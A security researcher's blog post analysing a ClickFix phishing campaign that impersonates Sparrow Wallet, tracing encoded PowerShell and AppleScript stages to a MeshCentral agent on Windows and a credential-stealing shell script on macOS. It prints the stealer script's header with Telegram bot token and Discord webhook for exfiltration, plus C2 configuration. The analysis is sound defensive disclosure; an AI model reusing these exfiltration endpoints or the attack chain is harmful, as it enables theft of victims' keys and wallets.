While browsing posts on X, I noticed that a user had shared a phishing email they had received. I decided to investigate and determine what was actually happening.

Pretext

The attack begins with a SendGrid email stating that Sparrow has implemented a 2FA system for accounts. For readers not deeply familiar with the Bitcoin ecosystem, Sparrow Wallet is a widely used self-custody wallet. It allows holders to manage their assets directly from their computer. It's worth noting that Sparrow doesn't have a login system, it's a client. Minus a few points to the attackers, however, they really don't care.

So what happens to a user when they connect to the site? Well, the user is presented with a popup to try and run a script.

This is a ClickFix style attack. Essentially, attackers have users unknowingly execute system commands to usually deliver malware payloads to their system. While some systems have implemented some level of warnings are mitigations, it can still be quite successful. While just reporting to this extent would be nearly sufficient from a "hey, threat actors are doing a thing", I also wanted to actually dive into what's happening, what payloads were observed, etc...

Analyzing the attack

Once a user has connected to the malicious domain at hxxp://sparrowwallet2fa[.]com, it loads a JavaScript file remotely from hxxps://projects2026box[.]com.

When viewing the JavaScript overlay file, we can observe several functions designed to handle payloads for Windows or Mac clients (we'll focus on Windows for a sec). When isolating the OS section for Windows, we see a const payloadWin=atob(). This instantly tells us that this is a base64 payload; no guessing required:

Once we have decoded this, we can observe that the payload is having the user execute a PowerShell encoded command:

When decoding the PowerShell encoded command, we observe another PowerShell encoded command, this time, pulling a file from hxxps://cfg[.]bucksittech[.]com/install:

The install file being executed contains another payload that is to be executed on the user's system:

In this case, a .exe file hosted on Github (yes, I've already reported this behavior) is being downloaded and executed. Looking at the metadata for the exe, we can see this is a MeshCentral agent. MeshCentral is a commonly used by threat actors as a command and control (C2) system to control infected victims.

Malware Observations

Checking sandbox execution, we can see the MeshCentral agent installer

VirusTotal also noted the following MeshCentral connection info:

{
"Botnet": "sparrow",
"Version": "2",
"MeshID": "0x34AFA6DFF8B6A55987738A24377959EB57D58AAD98A81BB6BD5B9131F0504D682B362D106CBA80599DFEC43A433DD1A5",
"ServerID": "EE9CA1BA70C227202F64427F4A4B1A861E218CC3DB551684C63CFAECE008032136C14AC02F4DB41CB1EC1502529F3AB7",
"C2": "wss://rmm.bucksittech[.]com:443/agent.ashx"
}

Burning More Configs

While MeshCentral is well documented in how it works, the Mac variant of this attack leverages a (arguably) nastier shell script. This differs from the Windows counterpart, which joins you to a botnet. Within the overlay JavaScript file, there's reference to a captchaverify_74946461.applescript file. This was the file being loaded in our screenshot at the top of the blog.

The applescript itself is straightforward and loads more base64-encoded commands:

After decoding the base64, we can observe the following curl request that downloads a shell script from hxxps://projects2026box[.]com/serve_site/captchaverify_74946461.sh:

The contents of the shell script are quite interesting. The first few lines divulge that the threat actor has also setup Telegram and Discord for C2/exfiltration activity:

#!/bin/bash
umask 077

TG_TOKEN="8613335985:AAE9Y6PCWaVY3teQlviHeF5P5rvOIHKNkew"
TG_CHAT="8635002848"
DISCORD_WEBHOOK="https://discord.com/api/webhooks/1498289000006549595/Tuc4dBDDqilyRU8fwmEku4uJqF3y1fhah23G29QN-KPDIU9heAAfVpcFMWuJGibXCi6Z"

Continuing down the script, we can see that it's set to download a syshelper file from the same host that has the shell scripts:

Aside from installing syshelper, the script sets up stealing keychain data, browser data, and crypto currency wallets, SSH Keys, Apple Notes, and also performs a check for several files to steal:

Telegram

Given that we have the telegram token information, we can pull some of the bot information. So, what/who is our bot?

The bot's name is @Bashstolebot (clever). We can also see that it has a chat with a member @macmalta.

We can see this confirmed within the membership information:

Closing

This campaign highlights how modern phishing attacks have evolved into cross-platform malware delivery operations. By impersonating Sparrow Wallet and abusing a fake 2FA notification, the attackers used a ClickFix-style technique to trick users into manually executing malicious commands. The investigation uncovered a multi-stage infection chain involving Base64-encoded PowerShell payloads, remote script execution, and the deployment of MeshCentral agents for persistent remote access on Windows systems. The macOS variant expanded further into credential theft, cryptocurrency wallet theft, browser data harvesting, and exfiltration through Telegram and Discord infrastructure.

Although parts of the campaign are no longer active, the tactics remain highly relevant. The attackers leveraged legitimate platforms such as GitHub and common remote management tools to blend malicious activity with normal traffic, demonstrating how threat actors increasingly rely on trusted services to evade detection. Ultimately, this campaign reinforces a simple but critical lesson: users should never execute scripts or commands provided by websites or unsolicited emails without verifying their legitimacy.

I wish I had more time to keep going through all of this data. Be safe out there,

-Synfinner